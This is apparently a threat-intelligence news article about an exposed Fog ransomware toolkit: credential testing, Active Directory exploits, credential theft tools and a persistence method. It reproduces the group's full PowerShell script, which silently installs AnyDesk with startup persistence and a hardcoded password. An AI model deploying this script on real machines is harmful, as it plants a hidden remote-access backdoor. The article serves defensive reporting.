Cybersecurity analysts have uncovered an open directory linked to the Fog ransomware group, revealing a comprehensive toolkit used by threat actors to compromise corporate networks.

The directory, discovered in December 2024 and hosted at IP address 194.48.154.79:80, contains an arsenal of tools designed for reconnaissance, exploitation, lateral movement, and persistence within victim environments.

This discovery provides rare insight into the operational methodology of ransomware affiliates, showing how they leverage both custom and publicly available tools to execute their campaigns.

The Fog ransomware group, first observed in mid-2024, has been targeting organizations across multiple sectors, including technology, education, retail, and logistics.

The geographic distribution of victims spans Europe, North America, and South America, with particular concentration in Italy, Greece, Brazil, and the USA.

Analysis of the directory’s contents revealed that initial access to victim networks was primarily achieved through compromised SonicWall VPN credentials, followed by systematic exploitation of Active Directory environments to gain domain administrator privileges.

The DFIR Report analysts identified a Python script within the directory specifically designed to test compromised SonicWall VPN credentials.

The script, found in a file named “sonic_scan/main.py,” automates the authentication process to SonicWall VPN appliances and executes port scans to identify potential entry points into victim networks.

This technique aligns with previous findings linking the use of compromised SonicWall credentials to Fog Ransomware operations.

What makes this discovery particularly concerning is the comprehensive nature of the toolkit, which includes multiple exploits for Active Directory vulnerabilities such as Zerologon (CVE-2020-1472) and domain controller impersonation flaws (CVE-2021-42278 and CVE-2021-42287).

These tools enable threat actors to quickly escalate privileges within compromised environments, moving from initial access to domain dominance in relatively short timeframes.

The toolkit also includes specialized credential theft utilities like DonPAPI, which can extract Windows Data Protection API (DPAPI) protected credentials from various sources, including browser passwords, cookies, certificates, and Windows credential manager.

This comprehensive access to credentials further facilitates the attacker’s ability to move laterally through networks.

Persistence Through Automated Remote Access

A notable aspect of the Fog ransomware operation is its persistence mechanism through the legitimate remote access tool AnyDesk.

The directory contained a PowerShell script named “any.ps1” that automates the installation and configuration of AnyDesk with a hardcoded password.

This approach ensures the threat actors maintain access to compromised systems even if their initial entry point is remediated.

The script functions by creating a directory in C:\ProgramData\AnyDesk, downloading the AnyDesk executable from the official website, installing it with startup persistence, and setting a predefined password:-

Function AnyDesk {
  mkdir "C:\ProgramData\AnyDesk"
  $clnt = new-object System.Net.WebClient
  $url = "http://download.anydesk.com/AnyDesk.exe"
  $file = "C:\ProgramData\AnyDesk.exe"
  $clnt.DownloadFile($url,$file)
  cmd. exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
  cmd. exe /c echo Admin#123 | C:\ProgramData\anydesk.exe --set-password
  cmd. exe /c C:\ProgramData\AnyDesk.exe --get-id
}

This persistence tactic is particularly effective because it leverages legitimate software that might not trigger security alerts.

By using the official AnyDesk download and implementing it with startup parameters, the threat actors create a backdoor that appears as normal remote support software to many detection systems.

The discovery of this directory provides valuable intelligence for organizations seeking to protect themselves against the Fog ransomware group and highlights the importance of securing VPN credentials and monitoring for unauthorized remote access tools.

Malware Trends Report Based on 15000 SOC Teams Incidents, Q1 2025 out!-> Get Your Free Copy